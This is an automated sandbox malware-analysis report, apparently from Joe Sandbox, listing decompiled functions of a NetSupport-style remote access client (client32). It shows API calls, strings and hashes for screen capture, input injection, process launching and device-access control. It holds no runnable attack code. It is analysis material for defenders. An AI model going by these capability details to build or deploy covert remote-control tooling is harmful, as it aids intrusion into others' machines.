StretchBlt.GDI32(?,?,?,00000000,?,00000000,00000000,00000000,00000280,000001E0,00CC0020), ref: 110CD69C
SelectObject.GDI32(00000000,1101C9B1), ref: 110CD6A7
DeleteObject.GDI32(?), ref: 110CD6B1
DeleteDC.GDI32(00000000), ref: 110CD6B8
ReleaseDC.USER32(00000000,00000000), ref: 110CD6C1
SetStretchBltMode.GDI32(?,?), ref: 110CD6CE

Strings

@Ls, xrefs: 110CD617

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Stretch$ModeObject$CompatibleCreateDeleteSelect$BitmapRelease
String ID: @Ls
API String ID: 3869104054-4225762999
Opcode ID: 4cd5c15a1307939a7bc44611b11280addb4b9eea335058283b3b6782dfa3e116
Instruction ID: 6fcd98f032939e49e657ba5034e0ee3eaac8dcc65a820ee95e38efdc43828b63
Opcode Fuzzy Hash: 4cd5c15a1307939a7bc44611b11280addb4b9eea335058283b3b6782dfa3e116
Instruction Fuzzy Hash: 7C3109B5600215AFD700DFA8CC89FAEB7B9EF8D705F208159FA15DB294D670AD01CBA1

Function 1100D210 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1100D281

Strings

BadParam, xrefs: 1100D261
Unknown error %d, xrefs: 1100D277
Exception, xrefs: 1100D268, 1100D276
StillInstances, xrefs: 1100D26F
AlreadyStopped, xrefs: 1100D24C
NoCapClients, xrefs: 1100D253
CannotGetFunc, xrefs: 1100D23E
NotFound, xrefs: 1100D25A
DllInitFailed, xrefs: 1100D237
AlreadyStarted, xrefs: 1100D245
RequiresVista, xrefs: 1100D229
CannotLoadDll, xrefs: 1100D230

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
API String ID: 2111968516-2092292787
Opcode ID: 71b832774a9a67cc2805294b152cedf335a5b2d3806edc2898a462ed524f8ead
Instruction ID: 015081efe9a757f342e5b51a9668928ba0dcf5b3a59938d54183b4fdf0967b8e
Opcode Fuzzy Hash: 71b832774a9a67cc2805294b152cedf335a5b2d3806edc2898a462ed524f8ead
Instruction Fuzzy Hash: 77F05A3A68051D57AA0187ED780547EF38D678057D7C8909AF4BCEAE20F912DCE0A2D9

Function 110FD190 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 247libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32,?,?,?,?,00000000), ref: 110FD30D
GetProcAddress.KERNEL32(00000000,GetGUIThreadInfo), ref: 110FD325
_memset.LIBCMT ref: 110FD342
GetProcAddress.KERNEL32(?,SendInput), ref: 110FD39A
FreeLibrary.KERNEL32(?,?,00000000), ref: 110FD486

Strings

SendInput, xrefs: 110FD394
user32, xrefs: 110FD308
GetGUIThreadInfo, xrefs: 110FD31F
0, xrefs: 110FD353

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad_memset
String ID: 0$GetGUIThreadInfo$SendInput$user32
API String ID: 530983809-271338563
Opcode ID: 8453a725e6bcc6fb064359c060f027c82fd18e66a9309b6faeda76eac3c62d64
Instruction ID: 01b5dffcd2aceb3d1c19df19a15d3ce4100fbe37034ad31773c34160b3100dcb
Opcode Fuzzy Hash: 8453a725e6bcc6fb064359c060f027c82fd18e66a9309b6faeda76eac3c62d64
Instruction Fuzzy Hash: F3A1C470E053A6DFDB16CF64C885BADBBF9FB44708F0081A9E52897284DB759A80CF50

Function 1114D5A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 1114D625
VariantClear.OLEAUT32(00000000), ref: 1114D6E7
_com_util::ConvertStringToBSTR.COMSUPP ref: 1114D6FD

Strings

IsA(), xrefs: 1114D6CD
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1114D6C8

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Variant$ClearConvertInitString_com_util::
String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 2883245406-3415836059
Opcode ID: 5c2f55d6810d0bdc67b1bbd46f99fb8d8f198d28398623af644c9f356b450d6f
Instruction ID: b712c9d6c7d4c32b004ce4bf58e00fe892e2b59da5cc4dfc33913f347413ee04
Opcode Fuzzy Hash: 5c2f55d6810d0bdc67b1bbd46f99fb8d8f198d28398623af644c9f356b450d6f
Instruction Fuzzy Hash: BD611E76D0061A9FCB04DBE4D990EDEF7B9FF98304F108659E516A7244EB34AA05CFA0

Function 1111B070 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

GetWindowLongA.USER32(?,000000EC), ref: 1111B13E
SetWindowLongA.USER32(?,000000EC,00000000), ref: 1111B14C
GetWindowRect.USER32(?,?), ref: 1111B16B
MoveWindow.USER32(?,00000000,?,00000000,00000000,00000001), ref: 1111B1A9
GetWindowLongA.USER32(?,000000EC), ref: 1111B1B7
SetWindowLongA.USER32(?,000000EC,00000000), ref: 1111B1C5
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 1111B1DB
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 1111B207

Strings

FullScreen, xrefs: 1111B095
View, xrefs: 1111B09A, 1111B0C2
*MustBeFrontWindow, xrefs: 1111B0BD

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Long$Move$Rect__wcstoi64
String ID: *MustBeFrontWindow$FullScreen$View
API String ID: 24119980-532707272
Opcode ID: 27135e5b2a2a9c3cfe3e5f8cfb40093d35a09cd7de9a97650aa5a1e66709048b
Instruction ID: 185e9f1ea3d5207c87e1ffc6726db70e2c87aaa3b485fd7a04bef55b5faf1d4e
Opcode Fuzzy Hash: 27135e5b2a2a9c3cfe3e5f8cfb40093d35a09cd7de9a97650aa5a1e66709048b
Instruction Fuzzy Hash: F2519075600201ABEB10DF64CDC5FAAF779BB88714F044278FE199F2CAD671A840CBA5

Function 11075100 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(111E86C0,33E68B52,1110BE6D,00000000,00000000,00000000,E8111B17,1117EB23,000000FF,?,1110B52D,000367BB,90680D75,E8111B17,00000001,00000000), ref: 1107514E

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

InitializeCriticalSection.KERNEL32(0000000C,?,1110B52D,000367BB,90680D75,E8111B17,00000001,00000000,33E68B52,00000000,00000001,00000000,00000000,11186608,000000FF), ref: 110751B7
InitializeCriticalSection.KERNEL32(00000024,?,1110B52D,000367BB,90680D75,E8111B17,00000001,00000000,33E68B52,00000000,00000001,00000000,00000000,11186608,000000FF), ref: 110751BD
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110B52D,000367BB,90680D75,E8111B17,00000001,00000000,33E68B52,00000000,00000001,00000000,00000000), ref: 110751C7
InitializeCriticalSection.KERNEL32(000004C8,?,1110B52D,000367BB,90680D75,E8111B17,00000001,00000000,33E68B52,00000000,00000001,00000000,00000000), ref: 1107521C
InitializeCriticalSection.KERNEL32(000004F0,?,1110B52D,000367BB,90680D75,E8111B17,00000001,00000000,33E68B52,00000000,00000001,00000000,00000000), ref: 11075225

Strings

*MaxRxPending, xrefs: 11075296
_debug, xrefs: 110752C5, 110752DF
General, xrefs: 1107529B
*TraceRecv, xrefs: 110752A7
*TraceSend, xrefs: 110752D1

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection$CreateEvent__wcstoi64
String ID: *MaxRxPending$*TraceRecv$*TraceSend$General$_debug
API String ID: 4263422321-2298398812
Opcode ID: b593313db8faf79fd2a5390c95aa100adf2fd77e5de57f9a21115235a6a47cd8
Instruction ID: 22e00c787966b76eb8210ca7bbbd29da5d83387ddcc2761586be5f55706fd98d
Opcode Fuzzy Hash: b593313db8faf79fd2a5390c95aa100adf2fd77e5de57f9a21115235a6a47cd8
Instruction Fuzzy Hash: 3251A171A006859FDB11CF55CC84BDBBBE8FF84704F0484AAEE599F245D771A604CBA1

Function 1103D0D0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 146COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1103D116
_memmove.LIBCMT ref: 1103D123

Strings

IsA(), xrefs: 1103D1D4
SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103D17F
BLOCKPRINTING, xrefs: 1103D18D
SETOPTICALDRIVEACCESS, xrefs: 1103D164
SETUSBMASSSTORAGEACCESS, xrefs: 1103D133
BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103D1AB
SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103D156
RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103D1B2
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D1CF

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _malloc_memmove
String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 1183979061-1830555902
Opcode ID: 1f65e24db0ee4bc6d2c59bc8d5d4299780c635b3bb03f5417b430c2a022d1bb4
Instruction ID: de23f8d0f39316dad5cb068c19bc5dab84371540c860885479258edd5296410e
Opcode Fuzzy Hash: 1f65e24db0ee4bc6d2c59bc8d5d4299780c635b3bb03f5417b430c2a022d1bb4
Instruction Fuzzy Hash: 4E41B37991021AAFCB01CF64CC90FEEB7F9EF55258F044669EC15A7241EA35E908CBA1

Function 1105D1A0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 130windowregistryCOMMON

Download Yara Rule

APIs

RegisterClassA.USER32(111E8674), ref: 1105D202

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

CreateWindowExA.USER32(00000000,NSMCobrProxy,11190240,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1105D243
SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 1105D2CD
GetMessageA.USER32(00000000,?,00000000,00000000), ref: 1105D2F0
TranslateMessage.USER32(?), ref: 1105D306
DispatchMessageA.USER32(?), ref: 1105D30C

Strings

_bOK, xrefs: 1105D219
NSMCobrProxy, xrefs: 1105D1F8, 1105D23C, 1105D2C7
CobrowseProxy::RunCobrowse, xrefs: 1105D1CA
CobrowseProxy.cpp, xrefs: 1105D214, 1105D255
m_hAppWin, xrefs: 1105D25A

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
API String ID: 13347155-1383313024
Opcode ID: 62200ea7e6b1f605a7e2abac32212a953f919e72132901ec41544d03d56e9938
Instruction ID: a046bbadd0ead81cdf20d55ecf57fadbba2abd773838f5ba15bb6f4a1ea9b724
Opcode Fuzzy Hash: 62200ea7e6b1f605a7e2abac32212a953f919e72132901ec41544d03d56e9938
Instruction Fuzzy Hash: 7441E4B5E0034AABD751DFA5DC84F9FFBE4AB48758F10852AF915A7280EB30E441CB61

Function 110290C0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 97windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?), ref: 110290DC

Part of subcall function 11140180: GetTickCount.KERNEL32 ref: 111401E8

wsprintfA.USER32 ref: 11029127
MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
ExitProcess.KERNEL32 ref: 11029179
_strrchr.LIBCMT ref: 110291B5
ExitProcess.KERNEL32 ref: 110291F4

Strings

V12.10F2, xrefs: 11029113
Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s, xrefs: 11029121
Assert. File %hs, line %d, err %d, Expr %s, xrefs: 110290F6
Info. assert, restarting..., xrefs: 110291DD
Client32, xrefs: 11029155

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExitProcess$CountErrorLastMessageTick_strrchrwsprintf
String ID: Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s$Assert. File %hs, line %d, err %d, Expr %s$Client32$Info. assert, restarting...$V12.10F2
API String ID: 2763122592-903742727
Opcode ID: 8d814b777f5885ecc3161607af828dcd56ec3cb62fcb51e03cab17b11e5aa51b
Instruction ID: da4144d1c2ae4f16461deb381ff3f241ca730b44d9e4871f784c64456d5e012a
Opcode Fuzzy Hash: 8d814b777f5885ecc3161607af828dcd56ec3cb62fcb51e03cab17b11e5aa51b
Instruction Fuzzy Hash: 0431D579A01226AFE701DBE5CCC5FBAB7A8EB4470DF104029FA2597285E770A940CB61

Function 1100D560 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80processCOMMON

Download Yara Rule

APIs

Part of subcall function 110EBB50: LocalAlloc.KERNEL32(00000040,00000014,?,1100D57F,?), ref: 110EBB60
Part of subcall function 110EBB50: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D57F,?), ref: 110EBB72
Part of subcall function 110EBB50: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D57F,?), ref: 110EBB84

CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D597
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D5B0
_strrchr.LIBCMT ref: 1100D5BF
GetCurrentProcessId.KERNEL32 ref: 1100D5CF
wsprintfA.USER32 ref: 1100D5F0
_memset.LIBCMT ref: 1100D601
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D639
CloseHandle.KERNEL32(?,00000000), ref: 1100D651
CloseHandle.KERNEL32(?), ref: 1100D65A

Strings

%sNSSilence.exe %u %u, xrefs: 1100D5EA
D, xrefs: 1100D62F

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
